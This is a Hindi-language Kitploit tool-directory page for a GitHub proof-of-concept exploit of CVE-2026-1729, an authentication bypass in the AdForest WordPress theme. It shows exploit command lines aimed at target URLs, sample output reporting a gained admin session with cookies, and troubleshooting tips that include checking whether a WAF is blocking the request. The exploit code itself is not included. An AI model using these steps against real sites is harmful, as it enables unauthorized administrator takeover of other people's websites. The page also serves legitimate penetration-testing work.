Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass — The AdForest theme for WordPress is vulnerable to authentication bypass in all versions including, 6.0.12. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the 'sb_login_user_with_otp_fun' function. This makes it possible for unauthenticated attackers to log in, including admin | Kitploit
उपकरण/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

The AdForest theme for WordPress is vulnerable to authentication bypass in all versions including, 6.0.12. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the 'sb_login_user_with_otp_fun' function. This makes it possible for unauthenticated attackers to log in, including admin

साझा करें

CVE-2026-1729 - AdForest WordPress प्रमाणीकरण बाईपास PoC

विवरण

CVE-2026-1729 के लिए सरल प्रूफ ऑफ कॉन्सेप्ट (PoC) - AdForest WordPress थीम में प्रमाणीकरण बाईपास भेद्यता। लेखक: f3ds cr3w est 2oo2 ब्लॉग

विशेषताएँ

  • ✅ बिना क्रेडेंशियल के सीधे व्यवस्थापक पहुंच
  • ✅ उत्पादन WordPress इंस्टेंस पर काम करता है
  • ✅ कोई Docker सेटअप आवश्यक नहीं
  • ✅ सरल कमांड-लाइन इंटरफ़ेस
  • ✅ सत्र स्थिरता

आवश्यकताएँ

  • Python 3.6+
  • requests लाइब्रेरी

स्थापना

root@kitploit:~
pip install requests

उपयोग

बुनियादी उपयोग

root@kitploit:~
python poc/exploit.py https://target-site.com

विशिष्ट उपयोगकर्ता आईडी लक्ष्यित करें

root@kitploit:~
python poc/exploit.py https://target-site.com --user-id 2

उदाहरण

root@kitploit:~
# डिफ़ॉल्ट व्यवस्थापक (यूज़र आईडी 1) का शोषण करें
python poc/exploit.py https://example.com

# विशिष्ट उपयोगकर्ता खाते का शोषण करें
python poc/exploit.py https://example.com --user-id 5

# कई लक्ष्यों का परीक्षण करें
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

आउटपुट

root@kitploit:~
CVE-2026-1729 - AdForest WordPress प्रमाणीकरण बाईपास
=======================================================
चेतावनी: केवल अधिकृत परीक्षण के लिए!
=======================================================
[+] लक्ष्य: https://example.com
[+] लक्ष्यित उपयोगकर्ता आईडी: 1
[+] एक्सप्लॉइट भेजा जा रहा है: https://example.com/wp-admin/admin-ajax.php
[+] सफलता! व्यवस्थापक पहुंच प्रदान की गई
[+] व्यवस्थापक URL: https://example.com/wp-admin/
[+] सत्र कुकीज़: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] admin के रूप में लॉग इन किया गया

🎯 एक्सप्लॉइट सफलतापूर्वक पूरा हुआ!
अब आपके पास WordPress साइट पर व्यवस्थापक पहुंच है।

एक्सप्लॉइट के बाद क्या होता है

  1. व्यवस्थापक पहुंच: आपको /wp-admin/ तक पूर्ण व्यवस्थापक पहुंच मिलती है
  2. सत्र स्थिरता: एक्सप्लॉइट सत्र कुकीज़ बनाए रखता है
  3. उपयोगकर्ता जानकारी: दिखाता है कि आपने कौन सा खाता समझौता किया है
  4. सीधी पहुंच: आप तुरंत WordPress व्यवस्थापक डैशबोर्ड तक पहुंच सकते हैं

नोट्स

  • कानूनी उपयोग: केवल उन साइटों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है
  • लक्ष्य आवश्यकताएँ: साइट पर AdForest थीम स्थापित होनी चाहिए
  • सफलता दर: AdForest थीम के असुरक्षित संस्करणों पर काम करता है
  • कोई स्थापना नहीं: लक्ष्य सर्वर पर कुछ भी स्थापित करने की आवश्यकता नहीं है

समस्या निवारण

यदि एक्सप्लॉइट विफल होता है:

  1. जांचें कि AdForest थीम स्थापित है
  2. जांचें कि साइट WordPress चला रही है
  3. सुनिश्चित करें कि थीम संस्करण असुरक्षित है
  4. अनुरोध को अवरुद्ध करने वाला कोई WAF या सुरक्षा प्लगइन नहीं
टूल डाउनलोड करें